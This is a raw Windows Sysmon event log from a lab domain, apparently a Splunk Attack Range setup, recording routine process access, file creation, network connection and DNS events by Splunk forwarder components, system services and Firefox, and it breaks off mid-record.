08:06:53.981{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.981{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.981{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.981{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81D-60EB-EE7D-00000000CF01}9724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.966{466BC892-F81D-60EB-EE7D-00000000CF01}9724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.732{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2EBCD22AA40BBC94805CF6C7F39E8840,SHA256=C0AA324302DF00F108899B80ABC0952883D32B4FA037DC8C9E4FFA0CFB62A91E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.550{466BC892-F81D-60EB-ED7D-00000000CF01}100401724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.363{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81D-60EB-ED7D-00000000CF01}10040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.363{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.363{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.363{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.363{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.363{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F81D-60EB-ED7D-00000000CF01}10040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.347{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81D-60EB-ED7D-00000000CF01}10040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.349{466BC892-F81D-60EB-ED7D-00000000CF01}10040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.095{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ECA95504E4DD860F2EDA0B66C7769F0,SHA256=44A43DE69D03AACDDD2977E8960ED70046594A121726E8D66B1A89F5E9EEA3BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810226Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:54.805{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8484E9EB64DEC2B1E5103C9E68C38F6,SHA256=5541E2C2E2B435A08F17F4C0E2B6534A15E2883462D3DA396611A5FE0F5F8BF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:54.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8ADFF6366B548F37DD89F797CC570C59,SHA256=88043A0D496256357391EC260C9213435FE2A12E14180592D49414DFA50977B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:54.112{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8E39246058F3C23F3D50D343FD439BC,SHA256=21B0FCD6B161038076AD64473F9B6DD4D5C2C560B1DA282DA4824A896BE9E113,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:54.112{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810228Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:55.852{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4235B7DB60DE5007119552AE8560D035,SHA256=1AC71155180A259C64F2FAA6C2809BDAFFCF422572AF564E5C305B13516D2BE2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:55.512{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001054364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:55.130{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68B606DA64E5FD2AC35098E41085BECB,SHA256=C1B3C1B90D16452F97E32D884CC934A97F3D973F51EFDA8F2602D93F5D82756D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810227Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:54.295{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57452-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810229Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:56.868{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6AFA7335B9A0C1880120CEB71046EFF,SHA256=B600FF5C2ABDCD2C992CF91C29C4DE44F7FA8D22C73733EA83EFCC5D4DE6A44E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:56.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=854138DFB90332AD7936A72176ABC441,SHA256=3DC45362909AEAAA40CB9AD4EB0FCAF365E1A273BBB1D53AD18BFBAB78C5AC87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:56.165{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BF659222ADEAE1002F209EFC8F25FD,SHA256=5526C89B7A3A4FF51C6AF0CF8EEC42149C83F242FD666BF9CB3828D175441427,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:47.739{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61953-false10.0.1.12-8000- 23542300x8000000000000000810230Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:57.914{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A7872C99A5480F8AE74A7ADC135D730,SHA256=C0F9A498B7F859C89B343D0311126A8D3FF740920C65E9348F1BFE78ADA865C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:57.466{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:57.334{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:57.182{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3220C5A943C16C39F832679ECFCBD44B,SHA256=E2BB3B9107F9FDE799F2338F1A4F81164BC02CF81ADF5A3BDD0FBE4FDE06673F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:49.042{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61954-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001054369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:49.042{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61954-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x8000000000000000810231Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:58.930{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A44A28A08DEAFB9D489C40BEC2848743,SHA256=0F53512550AB6AB0F65E102A452640D21B1F30B1C9F0AF313662C6E02C4CBBF4,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001054382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:56.988{466BC892-3462-60E8-100C-00000000CF01}8944d2nxq2uap88usk.cloudfront.net02600:9000:2156:5600:a:da5e:7900:93a1;2600:9000:2156:6c00:a:da5e:7900:93a1;2600:9000:2156:ec00:a:da5e:7900:93a1;2600:9000:2156:1a00:a:da5e:7900:93a1;2600:9000:2156:d400:a:da5e:7900:93a1;2600:9000:2156:b400:a:da5e:7900:93a1;2600:9000:2156:ee00:a:da5e:7900:93a1;2600:9000:2156:ac00:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001054381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:56.986{466BC892-3462-60E8-100C-00000000CF01}8944d2nxq2uap88usk.cloudfront.net013.32.25.96;13.32.25.81;13.32.25.69;13.32.25.34;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001054380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:58.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\broadcast-listeners.jsonMD5=E31DDAC0F78D87A5E4FA70F31042EDF1,SHA256=4F65E04348C667AABB7FA1085CF8A78D4D8DDAB4F4E50F166A79CE65C9CBC630,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 